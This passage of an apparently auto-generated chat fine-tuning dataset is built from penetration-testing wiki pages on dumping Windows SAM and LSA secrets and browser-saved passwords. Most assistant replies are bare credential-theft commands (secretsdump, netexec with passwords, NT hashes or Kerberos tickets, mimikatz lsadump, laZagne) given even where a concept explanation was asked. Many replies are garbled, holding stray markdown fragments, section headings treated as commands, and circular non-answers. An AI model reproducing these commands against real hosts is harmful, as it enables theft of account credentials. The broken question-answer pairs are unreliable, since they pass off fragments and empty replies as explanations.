"docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Offline dumping of SAM secrets from exported hives work?"}, {"role": "assistant", "content": "secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Offline dumping of SAM secrets from exported hives work?", "response": "secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL", "metadata": {"corpus_index": 360, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Offline dumping of SAM secrets from exported hives"}, {"role": "assistant", "content": "secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Offline dumping of SAM secrets from exported hives", "response": "secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL", "metadata": {"corpus_index": 360, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Offline dumping of SAM & LSA secrets from exported hives?"}, {"role": "assistant", "content": "secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL\n``\n\n=== netexec\n\nNetExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Offline dumping of SAM & LSA secrets from exported hives?", "response": "secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL\n``\n\n=== netexec\n\nNetExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)\n\n``bash", "metadata": {"corpus_index": 361, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Offline dumping of SAM & LSA secrets from exported hives"}, {"role": "assistant", "content": "secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL\n``\n\n=== netexec\n\nNetExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Offline dumping of SAM & LSA secrets from exported hives", "response": "secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL\n``\n\n=== netexec\n\nNetExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)\n\n``bash", "metadata": {"corpus_index": 361, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Offline dumping of SAM & LSA secrets from exported hives?"}, {"role": "assistant", "content": "=== netexec\n\n[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like [pass-the-hash](../../ntlm/pth.md) (NTLM), or [pass-the-ticket](../../kerberos/ptt.md) (Kerberos)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Offline dumping of SAM & LSA secrets from exported hives?", "response": "=== netexec\n\n[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like [pass-the-hash](../../ntlm/pth.md) (NTLM), or [pass-the-ticket](../../kerberos/ptt.md) (Kerberos)", "metadata": {"corpus_index": 362, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== netexec`?"}, {"role": "assistant", "content": "This command is used for offline dumping of sam & lsa secrets from exported hives. Offline dumping of SAM & LSA secrets from exported hives"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== netexec`?", "response": "This command is used for offline dumping of sam & lsa secrets from exported hives. Offline dumping of SAM & LSA secrets from exported hives", "metadata": {"corpus_index": 362, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Remote dumping of SAM/LSA secrets?"}, {"role": "assistant", "content": "netexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Remote dumping of SAM/LSA secrets?", "response": "netexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa", "metadata": {"corpus_index": 363, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Remote dumping of SAM/LSA secrets?"}, {"role": "assistant", "content": "netexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Remote dumping of SAM/LSA secrets?", "response": "netexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa", "metadata": {"corpus_index": 363, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Remote dumping of SAM/LSA secrets (local user authentication)?"}, {"role": "assistant", "content": "netexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Remote dumping of SAM/LSA secrets (local user authentication)?", "response": "netexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa", "metadata": {"corpus_index": 364, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Remote dumping of SAM/LSA secrets (local user authentication)?"}, {"role": "assistant", "content": "netexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Remote dumping of SAM/LSA secrets (local user authentication)?", "response": "netexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa", "metadata": {"corpus_index": 364, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Remote dumping of SAM/LSA secrets (pass-the-hash) in the context of penetration testing"}, {"role": "assistant", "content": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Remote dumping of SAM/LSA secrets (pass-the-hash) in the context of penetration testing", "response": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa", "metadata": {"corpus_index": 365, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Remote dumping of SAM/LSA secrets (pass-the-hash)"}, {"role": "assistant", "content": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Remote dumping of SAM/LSA secrets (pass-the-hash)", "response": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa", "metadata": {"corpus_index": 365, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Remote dumping of SAM/LSA secrets (pass-the-ticket)"}, {"role": "assistant", "content": "netexec smb $TARGETS --kerberos --sam/--lsa\n``\n\n=== Mimikatz\n\nMimikatz can be used locally with lsadump::sam and lsadump::secrets to extract credentials from SAM and SECURITY registry hives (and SYSTEM for the encryption keys), or offline with hive dumps.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Remote dumping of SAM/LSA secrets (pass-the-ticket)", "response": "netexec smb $TARGETS --kerberos --sam/--lsa\n``\n\n=== Mimikatz\n\nMimikatz can be used locally with lsadump::sam and lsadump::secrets to extract credentials from SAM and SECURITY registry hives (and SYSTEM for the encryption keys), or offline with hive dumps.\n\n``bash", "metadata": {"corpus_index": 366, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Remote dumping of SAM/LSA secrets (pass-the-ticket)?"}, {"role": "assistant", "content": "netexec smb $TARGETS --kerberos --sam/--lsa\n``\n\n=== Mimikatz\n\nMimikatz can be used locally with lsadump::sam and lsadump::secrets to extract credentials from SAM and SECURITY registry hives (and SYSTEM for the encryption keys), or offline with hive dumps.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Remote dumping of SAM/LSA secrets (pass-the-ticket)?", "response": "netexec smb $TARGETS --kerberos --sam/--lsa\n``\n\n=== Mimikatz\n\nMimikatz can be used locally with lsadump::sam and lsadump::secrets to extract credentials from SAM and SECURITY registry hives (and SYSTEM for the encryption keys), or offline with hive dumps.\n\n``bash", "metadata": {"corpus_index": 366, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Remote dumping of SAM/LSA secrets (pass-the-ticket) during a pentest?"}, {"role": "assistant", "content": "=== Mimikatz\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) can be used locally with [`lsadump::sam`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/sam) and [`lsadump::secrets`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/secrets) to extract credentials from `SAM` and `SECURITY` registry hives (and `SYSTEM` for the encryption keys), or offline with hive dumps."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Remote dumping of SAM/LSA secrets (pass-the-ticket) during a pentest?", "response": "=== Mimikatz\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) can be used locally with [`lsadump::sam`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/sam) and [`lsadump::secrets`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/secrets) to extract credentials from `SAM` and `SECURITY` registry hives (and `SYSTEM` for the encryption keys), or offline with hive dumps.", "metadata": {"corpus_index": 367, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Mimikatz`?"}, {"role": "assistant", "content": "This command is used for remote dumping of sam/lsa secrets (pass-the-ticket). Remote dumping of SAM/LSA secrets (pass-the-ticket)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Mimikatz`?", "response": "This command is used for remote dumping of sam/lsa secrets (pass-the-ticket). Remote dumping of SAM/LSA secrets (pass-the-ticket)", "metadata": {"corpus_index": 367, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Offline dumping of SAM secrets from exported hives in the context of penetration testing"}, {"role": "assistant", "content": "lsadump::sam /sam:'C:\\path\\to\\sam.save' /system:'C:\\path\\to\\system.save'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Offline dumping of SAM secrets from exported hives in the context of penetration testing", "response": "lsadump::sam /sam:'C:\\path\\to\\sam.save' /system:'C:\\path\\to\\system.save'", "metadata": {"corpus_index": 368, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Offline dumping of SAM secrets from exported hives during a pentest?"}, {"role": "assistant", "content": "lsadump::sam /sam:'C:\\path\\to\\sam.save' /system:'C:\\path\\to\\system.save'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Offline dumping of SAM secrets from exported hives during a pentest?", "response": "lsadump::sam /sam:'C:\\path\\to\\sam.save' /system:'C:\\path\\to\\system.save'", "metadata": {"corpus_index": 368, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Offline dumping LSA secrets from exported hives"}, {"role": "assistant", "content": "lsadump::secrets /security:'C:\\path\\to\\security.save' /system:'C:\\path\\to\\system.save'\n```\n\n:::\n\n> [!TIP]\n> Secretsdump (Impacket) and NetExec both extract security questions, if any, from the LSA. They are json formatted, UTF-16-LE encoded, and hex encoded on top of that."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Offline dumping LSA secrets from exported hives", "response": "lsadump::secrets /security:'C:\\path\\to\\security.save' /system:'C:\\path\\to\\system.save'\n```\n\n:::\n\n> [!TIP]\n> Secretsdump (Impacket) and NetExec both extract security questions, if any, from the LSA. They are json formatted, UTF-16-LE encoded, and hex encoded on top of that.", "metadata": {"corpus_index": 369, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Offline dumping LSA secrets from exported hives?"}, {"role": "assistant", "content": "lsadump::secrets /security:'C:\\path\\to\\security.save' /system:'C:\\path\\to\\system.save'\n```\n\n:::\n\n> [!TIP]\n> Secretsdump (Impacket) and NetExec both extract security questions, if any, from the LSA. They are json formatted, UTF-16-LE encoded, and hex encoded on top of that."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Offline dumping LSA secrets from exported hives?", "response": "lsadump::secrets /security:'C:\\path\\to\\security.save' /system:'C:\\path\\to\\system.save'\n```\n\n:::\n\n> [!TIP]\n> Secretsdump (Impacket) and NetExec both extract security questions, if any, from the LSA. They are json formatted, UTF-16-LE encoded, and hex encoded on top of that.", "metadata": {"corpus_index": 369, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Web browsers - Theory?"}, {"role": "assistant", "content": "Just like other common programs and applications, most web browsers offer \"credential saving\" features allowing users to access restricted resources without supplying a username and password every time. The downside of this kind of features is that attackers that have access to the storage of these browsers can potentially extract those credentials and use them for credentials spraying, stuffing, and so forth."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Web browsers - Theory?", "response": "Just like other common programs and applications, most web browsers offer \"credential saving\" features allowing users to access restricted resources without supplying a username and password every time. The downside of this kind of features is that attackers that have access to the storage of these browsers can potentially extract those credentials and use them for credentials spraying, stuffing, and so forth.", "metadata": {"corpus_index": 370, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/web-browsers.md", "page_title": "Web browsers", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Web browsers - Theory"}, {"role": "assistant", "content": "Just like other common programs and applications, most web browsers offer \"credential saving\" features allowing users to access restricted resources without supplying a username and password every time. The downside of this kind of features is that attackers that have access to the storage of these browsers can potentially extract those credentials and use them for credentials spraying, stuffing, and so forth."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Web browsers - Theory", "response": "Just like other common programs and applications, most web browsers offer \"credential saving\" features allowing users to access restricted resources without supplying a username and password every time. The downside of this kind of features is that attackers that have access to the storage of these browsers can potentially extract those credentials and use them for credentials spraying, stuffing, and so forth.", "metadata": {"corpus_index": 370, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/web-browsers.md", "page_title": "Web browsers", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Web browsers - Practice"}, {"role": "assistant", "content": "The LaZagne (Python) project is a go-to reference from browser credentials dumping (among other awesome dumping features).\n\n``bash\nlaZagne browsers\n`\n\nThere are other tools and modules that allow to operate browser credential dumping attacks like metasploit's post/multi/gather/firefox_creds and post/windows/gather/enum_chrome modules, firefox decrypt (Python) and chrome decrypter (Python). On Windows systems, browsers like Chrome, Brave and Opera rely on Windows's DPAPI to store credentials. Mimikatz (C) can then be used (e.g. dpapi::chrome`)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Web browsers - Practice", "response": "The LaZagne (Python) project is a go-to reference from browser credentials dumping (among other awesome dumping features).\n\n``bash\nlaZagne browsers\n`\n\nThere are other tools and modules that allow to operate browser credential dumping attacks like metasploit's post/multi/gather/firefox_creds and post/windows/gather/enum_chrome modules, firefox decrypt (Python) and chrome decrypter (Python). On Windows systems, browsers like Chrome, Brave and Opera rely on Windows's DPAPI to store credentials. Mimikatz (C) can then be used (e.g. dpapi::chrome`).", "metadata": {"corpus_index": 371, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/web-browsers.md", "page_title": "Web browsers", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Web browsers - Practice"}, {"role": "assistant", "content": "The LaZagne (Python) project is a go-to reference from browser credentials dumping (among other awesome dumping features).\n\n``bash\nlaZagne browsers\n`\n\nThere are other tools and modules that allow to operate browser credential dumping attacks like metasploit's post/multi/gather/firefox_creds and post/windows/gather/enum_chrome modules, firefox decrypt (Python) and chrome decrypter (Python). On Windows systems, browsers like Chrome, Brave and Opera rely on Windows's DPAPI to store credentials. Mimikatz (C) can then be used (e.g. dpapi::chrome`)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Web browsers - Practice", "response": "The LaZagne (Python) project is a go-to reference from browser credentials dumping (among other awesome dumping features).\n\n``bash\nlaZagne browsers\n`\n\nThere are other tools and modules that allow to operate browser credential dumping attacks like metasploit's post/multi/gather/firefox_creds and post/windows/gather/enum_chrome modules, firefox decrypt (Python) and chrome decrypter (Python). On Windows systems, browsers like Chrome, Brave and Opera rely on Windows's DPAPI to store credentials. Mimikatz (C) can then be used (e.g. dpapi::chrome`).", "metadata": {"corpus_index": 371, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/web-browsers.md", "page_title": "Web browsers", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the laZagne command for web browsers - practice"}, {"role": "assistant", "content": "laZagne browsers"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the laZagne command for web browsers - practice", "response": "laZagne browsers", "metadata": {"corpus_index": 372, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/web-browsers.md", "page_title": "Web browsers", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "laZagne"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Web browsers - Practice"}, {"role": "assistant", "content": "laZagne browsers"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Web browsers - Practice", "response": "laZagne browsers", "metadata": {"corpus_index": 372, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/web-browsers.md", "page_title": "Web browsers", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `laZagne browsers`?"}, {"role": "assistant", "content": "This command is used for web browsers - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `laZagne browsers`?", "response": "This command is used for web browsers - practice. Practice", "metadata": {"corpus_index": 372, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/web-browsers.md", "page_title": "Web browsers", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Windows Credential Manager - Theory in the context of penetration testing"}, {"role": "assistant", "content": "Windows Credential Manager is a built-in feature that securely stores sensitive login information for websites, applications, and networks. It houses login credentials such as usernames, passwords, and web addresses. There are four distinct categories of stored credentials:\n\n1. Web-based credentials: authentication details saved in web browsers (or other applications)\n2. Windows-specific credentials: authentication data such as NTLM or Kerberos\n3. Generic credentials: fundamental authentication data, such as clear-text usernames and passwords\n4. Certificate-based credentials: comprehensive information based on certificates"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Windows Credential Manager - 